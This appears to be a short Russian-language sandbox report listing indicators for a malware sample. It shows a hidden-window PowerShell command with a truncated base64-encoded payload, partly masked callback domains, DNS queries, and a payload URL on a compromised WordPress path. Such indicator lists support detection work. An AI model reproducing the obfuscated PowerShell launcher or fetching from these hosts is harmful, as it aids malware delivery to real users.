Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABGAGwAbgBmAGkAdwBkAGoAPQAnAE0AYgBnAHEAeQBpAHkAYgBqAHYAdQBoACcAOwAkAE4AdwBxAGcAZQB5AGQAaABuACAAPQAgACcAMQAzADQAJwA7ACQARgBwAHIAcgBhAGcAeQBxAHoAeAA9ACcARAB2AHg...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1568
- %TEMP%\1203750.cvr
- 're#######ipaz.000webhostapp.com':443
- 'ra####shoreic.com':443
- 'my###y.style':443
- 'dl####mhomes.com':80
- 'zv######l.000webhostapp.com':443
- http://dl####mhomes.com/wp-admin/bwfPhHO/
- 're#######ipaz.000webhostapp.com':443
- 'ra####shoreic.com':443
- 'my###y.style':443
- 'zv######l.000webhostapp.com':443
- DNS ASK re#######ipaz.000webhostapp.com
- DNS ASK ra####shoreic.com
- DNS ASK my###y.style
- DNS ASK dl####mhomes.com
- DNS ASK zv######l.000webhostapp.com